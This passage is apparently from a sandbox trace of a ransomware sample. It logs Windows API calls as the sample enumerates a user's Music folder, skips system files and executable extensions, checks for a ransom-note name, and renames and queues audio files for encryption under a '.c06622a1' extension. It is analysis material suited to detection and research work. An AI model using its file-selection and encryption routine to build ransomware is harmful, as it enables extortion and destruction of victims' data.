(_String="drv") returned 0x3 [0151.147] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0151.147] wcslen (_String="exe") returned 0x3 [0151.147] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0151.147] wcslen (_String="hlp") returned 0x3 [0151.147] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0151.147] wcslen (_String="icl") returned 0x3 [0151.147] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0151.147] wcslen (_String="icns") returned 0x4 [0151.147] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0151.147] wcslen (_String="ico") returned 0x3 [0151.147] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0151.147] wcslen (_String="ics") returned 0x3 [0151.147] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0151.147] wcslen (_String="idx") returned 0x3 [0151.147] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0151.147] wcslen (_String="ldf") returned 0x3 [0151.147] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0151.147] wcslen (_String="lnk") returned 0x3 [0151.147] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0151.147] wcslen (_String="mod") returned 0x3 [0151.148] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0151.148] wcslen (_String="mpa") returned 0x3 [0151.148] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0151.148] wcslen (_String="msc") returned 0x3 [0151.148] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0151.148] wcslen (_String="msp") returned 0x3 [0151.148] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0151.148] wcslen (_String="msstyles") returned 0x8 [0151.148] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0151.148] wcslen (_String="msu") returned 0x3 [0151.148] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0151.148] wcslen (_String="nls") returned 0x3 [0151.148] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0151.148] wcslen (_String="nomedia") returned 0x7 [0151.148] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0151.148] wcslen (_String="ocx") returned 0x3 [0151.148] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0151.148] wcslen (_String="prf") returned 0x3 [0151.148] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0151.148] wcslen (_String="ps1") returned 0x3 [0151.148] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0151.148] wcslen (_String="rom") returned 0x3 [0151.148] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0151.148] wcslen (_String="rtp") returned 0x3 [0151.148] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0151.148] wcslen (_String="scr") returned 0x3 [0151.148] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0151.148] wcslen (_String="shs") returned 0x3 [0151.148] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0151.148] wcslen (_String="spl") returned 0x3 [0151.148] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0151.148] wcslen (_String="sys") returned 0x3 [0151.148] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0151.148] wcslen (_String="theme") returned 0x5 [0151.148] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0151.148] wcslen (_String="themepack") returned 0x9 [0151.148] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0151.149] wcslen (_String="wpx") returned 0x3 [0151.149] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0151.149] wcslen (_String="lock") returned 0x4 [0151.149] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0151.149] wcslen (_String="key") returned 0x3 [0151.149] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0151.149] wcslen (_String="hta") returned 0x3 [0151.149] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0151.149] wcslen (_String="msi") returned 0x3 [0151.149] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0151.149] wcslen (_String="pdb") returned 0x3 [0151.149] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0151.149] wcslen (_String="sql") returned 0x3 [0151.149] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0151.149] wcslen (_String="sqlite") returned 0x6 [0151.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.149] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0151.149] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.149] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned 0x2e [0151.149] wcscpy (in: _Dest=0x45000ee, _Source="5Z2NqwTA5 2JZZNSm.m4a" | out: _Dest="5Z2NqwTA5 2JZZNSm.m4a") returned="5Z2NqwTA5 2JZZNSm.m4a" [0151.149] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a", dwFileAttributes=0x80) returned 1 [0151.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\5z2nqwta5 2jzznsm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0151.150] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.150] ReadFile (in: hFile=0x610, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0151.150] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xcdf5f5b0 [0151.150] RtlComputeCrc32 (PartialCrc=0xf5b0, Buffer=0x3fe8f4, Length=0x80) returned 0x9ae22eca [0151.150] RtlComputeCrc32 (PartialCrc=0x2eca, Buffer=0x3fe8f4, Length=0x80) returned 0x29862c4b [0151.150] RtlComputeCrc32 (PartialCrc=0x2c4b, Buffer=0x3fe8f4, Length=0x80) returned 0x702cd475 [0151.150] RtlComputeCrc32 (PartialCrc=0xd475, Buffer=0x3fe8f4, Length=0x80) returned 0xaf614d0 [0151.150] CloseHandle (hObject=0x610) returned 1 [0151.150] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0151.151] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a" [0151.151] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a") returned 0x44 [0151.151] wcscpy (in: _Dest=0x4510120, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.151] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\5z2nqwta5 2jzznsm.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\5z2nqwta5 2jzznsm.m4a.c06622a1"), dwFlags=0x8) returned 1 [0151.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\5Z2NqwTA5 2JZZNSm.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\5z2nqwta5 2jzznsm.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0151.162] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0151.162] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x210d6e09 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6f0a829 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fa3a442 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50d2fbec [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73675995 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28664313 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e96a135 [0151.167] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c9e295e [0151.170] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xf269f16c [0151.170] RtlComputeCrc32 (PartialCrc=0xf16c, Buffer=0x4280094, Length=0x80) returned 0xa051449f [0151.171] RtlComputeCrc32 (PartialCrc=0x449f, Buffer=0x4280094, Length=0x80) returned 0x9e6257b5 [0151.171] RtlComputeCrc32 (PartialCrc=0x57b5, Buffer=0x4280094, Length=0x80) returned 0x7009a8f9 [0151.171] RtlComputeCrc32 (PartialCrc=0xa8f9, Buffer=0x4280094, Length=0x80) returned 0xf195c1 [0151.171] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0151.171] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0151.171] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0151.171] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36815d0, ftCreationTime.dwHighDateTime=0x1d5e33f, ftLastAccessTime.dwLowDateTime=0x4edbf4f0, ftLastAccessTime.dwHighDateTime=0x1d5d9df, ftLastWriteTime.dwLowDateTime=0x4edbf4f0, ftLastWriteTime.dwHighDateTime=0x1d5d9df, nFileSizeHigh=0x0, nFileSizeLow=0x14c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="IIGN22M0Zn01dtJHw.wav", cAlternateFileName="IIGN22~1.WAV")) returned 1 [0151.171] _wcsicmp (_Str1="IIGN22M0Zn01dtJHw.wav", _Str2="README.c06622a1.TXT") returned -9 [0151.171] wcsstr (_Str="IIGN22M0Zn01dtJHw.wav", _SubStr="README") returned 0x0 [0151.171] _wcsicmp (_Str1="autorun.inf", _Str2="IIGN22M0Zn01dtJHw.wav") returned -8 [0151.171] wcslen (_String="autorun.inf") returned 0xb [0151.171] _wcsicmp (_Str1="boot.ini", _Str2="IIGN22M0Zn01dtJHw.wav") returned -7 [0151.171] wcslen (_String="boot.ini") returned 0x8 [0151.171] _wcsicmp (_Str1="bootfont.bin", _Str2="IIGN22M0Zn01dtJHw.wav") returned -7 [0151.171] wcslen (_String="bootfont.bin") returned 0xc [0151.171] _wcsicmp (_Str1="bootsect.bak", _Str2="IIGN22M0Zn01dtJHw.wav") returned -7 [0151.171] wcslen (_String="bootsect.bak") returned 0xc [0151.171] _wcsicmp (_Str1="desktop.ini", _Str2="IIGN22M0Zn01dtJHw.wav") returned -5 [0151.171] wcslen (_String="desktop.ini") returned 0xb [0151.171] _wcsicmp (_Str1="iconcache.db", _Str2="IIGN22M0Zn01dtJHw.wav") returned -6 [0151.171] wcslen (_String="iconcache.db") returned 0xc [0151.171] _wcsicmp (_Str1="ntldr", _Str2="IIGN22M0Zn01dtJHw.wav") returned 5 [0151.171] wcslen (_String="ntldr") returned 0x5 [0151.171] _wcsicmp (_Str1="ntuser.dat", _Str2="IIGN22M0Zn01dtJHw.wav") returned 5 [0151.171] wcslen (_String="ntuser.dat") returned 0xa [0151.171] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IIGN22M0Zn01dtJHw.wav") returned 5 [0151.171] wcslen (_String="ntuser.dat.log") returned 0xe [0151.171] _wcsicmp (_Str1="ntuser.ini", _Str2="IIGN22M0Zn01dtJHw.wav") returned 5 [0151.171] wcslen (_String="ntuser.ini") returned 0xa [0151.171] _wcsicmp (_Str1="thumbs.db", _Str2="IIGN22M0Zn01dtJHw.wav") returned 11 [0151.171] wcslen (_String="thumbs.db") returned 0x9 [0151.172] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0151.172] wcslen (_String="386") returned 0x3 [0151.172] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0151.172] wcslen (_String="adv") returned 0x3 [0151.172] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0151.172] wcslen (_String="ani") returned 0x3 [0151.172] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0151.172] wcslen (_String="bat") returned 0x3 [0151.172] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0151.172] wcslen (_String="bin") returned 0x3 [0151.172] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0151.172] wcslen (_String="cab") returned 0x3 [0151.172] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0151.172] wcslen (_String="cmd") returned 0x3 [0151.172] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0151.172] wcslen (_String="com") returned 0x3 [0151.172] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0151.172] wcslen (_String="cpl") returned 0x3 [0151.172] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0151.172] wcslen (_String="cur") returned 0x3 [0151.172] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0151.172] wcslen (_String="deskthemepack") returned 0xd [0151.172] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0151.172] wcslen (_String="diagcab") returned 0x7 [0151.172] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0151.172] wcslen (_String="diagcfg") returned 0x7 [0151.172] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0151.172] wcslen (_String="diagpkg") returned 0x7 [0151.172] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0151.172] wcslen (_String="dll") returned 0x3 [0151.172] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0151.172] wcslen (_String="drv") returned 0x3 [0151.172] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0151.172] wcslen (_String="exe") returned 0x3 [0151.172] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0151.173] wcslen (_String="hlp") returned 0x3 [0151.173] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0151.173] wcslen (_String="icl") returned 0x3 [0151.173] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0151.173] wcslen (_String="icns") returned 0x4 [0151.173] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0151.173] wcslen (_String="ico") returned 0x3 [0151.173] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0151.173] wcslen (_String="ics") returned 0x3 [0151.173] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0151.173] wcslen (_String="idx") returned 0x3 [0151.173] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0151.173] wcslen (_String="ldf") returned 0x3 [0151.173] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0151.173] wcslen (_String="lnk") returned 0x3 [0151.173] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0151.173] wcslen (_String="mod") returned 0x3 [0151.173] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0151.173] wcslen (_String="mpa") returned 0x3 [0151.173] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0151.173] wcslen (_String="msc") returned 0x3 [0151.173] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0151.173] wcslen (_String="msp") returned 0x3 [0151.173] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0151.173] wcslen (_String="msstyles") returned 0x8 [0151.173] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0151.173] wcslen (_String="msu") returned 0x3 [0151.173] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0151.173] wcslen (_String="nls") returned 0x3 [0151.173] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0151.173] wcslen (_String="nomedia") returned 0x7 [0151.173] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0151.173] wcslen (_String="ocx") returned 0x3 [0151.173] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0151.174] wcslen (_String="prf") returned 0x3 [0151.174] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0151.174] wcslen (_String="ps1") returned 0x3 [0151.174] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0151.174] wcslen (_String="rom") returned 0x3 [0151.174] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0151.174] wcslen (_String="rtp") returned 0x3 [0151.174] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0151.174] wcslen (_String="scr") returned 0x3 [0151.174] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0151.174] wcslen (_String="shs") returned 0x3 [0151.174] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0151.174] wcslen (_String="spl") returned 0x3 [0151.174] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0151.174] wcslen (_String="sys") returned 0x3 [0151.174] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0151.174] wcslen (_String="theme") returned 0x5 [0151.174] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0151.174] wcslen (_String="themepack") returned 0x9 [0151.174] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0151.174] wcslen (_String="wpx") returned 0x3 [0151.174] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0151.174] wcslen (_String="lock") returned 0x4 [0151.174] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0151.174] wcslen (_String="key") returned 0x3 [0151.174] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0151.174] wcslen (_String="hta") returned 0x3 [0151.174] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0151.174] wcslen (_String="msi") returned 0x3 [0151.174] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0151.174] wcslen (_String="pdb") returned 0x3 [0151.174] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0151.174] wcslen (_String="sql") returned 0x3 [0151.174] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0151.174] wcslen (_String="sqlite") returned 0x6 [0151.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.175] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0151.175] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.175] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned 0x2e [0151.175] wcscpy (in: _Dest=0x45000ee, _Source="IIGN22M0Zn01dtJHw.wav" | out: _Dest="IIGN22M0Zn01dtJHw.wav") returned="IIGN22M0Zn01dtJHw.wav" [0151.175] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav", dwFileAttributes=0x80) returned 1 [0151.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\iign22m0zn01dtjhw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0151.175] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.175] ReadFile (in: hFile=0x670, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0151.176] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xd3768513 [0151.176] RtlComputeCrc32 (PartialCrc=0x8513, Buffer=0x3fe8f4, Length=0x80) returned 0xd369cf21 [0151.176] RtlComputeCrc32 (PartialCrc=0xcf21, Buffer=0x3fe8f4, Length=0x80) returned 0x4cef736d [0151.176] RtlComputeCrc32 (PartialCrc=0x736d, Buffer=0x3fe8f4, Length=0x80) returned 0xcaed5c41 [0151.176] RtlComputeCrc32 (PartialCrc=0x5c41, Buffer=0x3fe8f4, Length=0x80) returned 0x1d472856 [0151.176] CloseHandle (hObject=0x670) returned 1 [0151.176] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0151.176] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav" [0151.177] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav") returned 0x44 [0151.177] wcscpy (in: _Dest=0x4510120, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.177] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\iign22m0zn01dtjhw.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\iign22m0zn01dtjhw.wav.c06622a1"), dwFlags=0x8) returned 1 [0151.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\IIGN22M0Zn01dtJHw.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\iign22m0zn01dtjhw.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0151.180] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0151.180] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x214cc538 [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x599a420b [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1fef0b18 [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d32814a [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d8ea2fe [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4934f22a [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4203bb1d [0151.186] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x88a9c98 [0151.189] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x6794f524 [0151.189] RtlComputeCrc32 (PartialCrc=0xf524, Buffer=0x4670094, Length=0x80) returned 0xc65413a2 [0151.189] RtlComputeCrc32 (PartialCrc=0x13a2, Buffer=0x4670094, Length=0x80) returned 0xe3509d2e [0151.189] RtlComputeCrc32 (PartialCrc=0x9d2e, Buffer=0x4670094, Length=0x80) returned 0x780100c0 [0151.189] RtlComputeCrc32 (PartialCrc=0xc0, Buffer=0x4670094, Length=0x80) returned 0x96e93373 [0151.189] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0151.189] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0151.189] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0151.189] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb39ad850, ftCreationTime.dwHighDateTime=0x1d5e2e7, ftLastAccessTime.dwLowDateTime=0xc764f850, ftLastAccessTime.dwHighDateTime=0x1d5dbbe, ftLastWriteTime.dwLowDateTime=0xc764f850, ftLastWriteTime.dwHighDateTime=0x1d5dbbe, nFileSizeHigh=0x0, nFileSizeLow=0x12e0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="m6oEvZ.m4a", cAlternateFileName="")) returned 1 [0151.189] _wcsicmp (_Str1="m6oEvZ.m4a", _Str2="README.c06622a1.TXT") returned -5 [0151.189] wcsstr (_Str="m6oEvZ.m4a", _SubStr="README") returned 0x0 [0151.189] _wcsicmp (_Str1="autorun.inf", _Str2="m6oEvZ.m4a") returned -12 [0151.189] wcslen (_String="autorun.inf") returned 0xb [0151.189] _wcsicmp (_Str1="boot.ini", _Str2="m6oEvZ.m4a") returned -11 [0151.189] wcslen (_String="boot.ini") returned 0x8 [0151.189] _wcsicmp (_Str1="bootfont.bin", _Str2="m6oEvZ.m4a") returned -11 [0151.189] wcslen (_String="bootfont.bin") returned 0xc [0151.189] _wcsicmp (_Str1="bootsect.bak", _Str2="m6oEvZ.m4a") returned -11 [0151.189] wcslen (_String="bootsect.bak") returned 0xc [0151.190] _wcsicmp (_Str1="desktop.ini", _Str2="m6oEvZ.m4a") returned -9 [0151.190] wcslen (_String="desktop.ini") returned 0xb [0151.190] _wcsicmp (_Str1="iconcache.db", _Str2="m6oEvZ.m4a") returned -4 [0151.190] wcslen (_String="iconcache.db") returned 0xc [0151.190] _wcsicmp (_Str1="ntldr", _Str2="m6oEvZ.m4a") returned 1 [0151.190] wcslen (_String="ntldr") returned 0x5 [0151.190] _wcsicmp (_Str1="ntuser.dat", _Str2="m6oEvZ.m4a") returned 1 [0151.190] wcslen (_String="ntuser.dat") returned 0xa [0151.190] _wcsicmp (_Str1="ntuser.dat.log", _Str2="m6oEvZ.m4a") returned 1 [0151.190] wcslen (_String="ntuser.dat.log") returned 0xe [0151.190] _wcsicmp (_Str1="ntuser.ini", _Str2="m6oEvZ.m4a") returned 1 [0151.190] wcslen (_String="ntuser.ini") returned 0xa [0151.190] _wcsicmp (_Str1="thumbs.db", _Str2="m6oEvZ.m4a") returned 7 [0151.190] wcslen 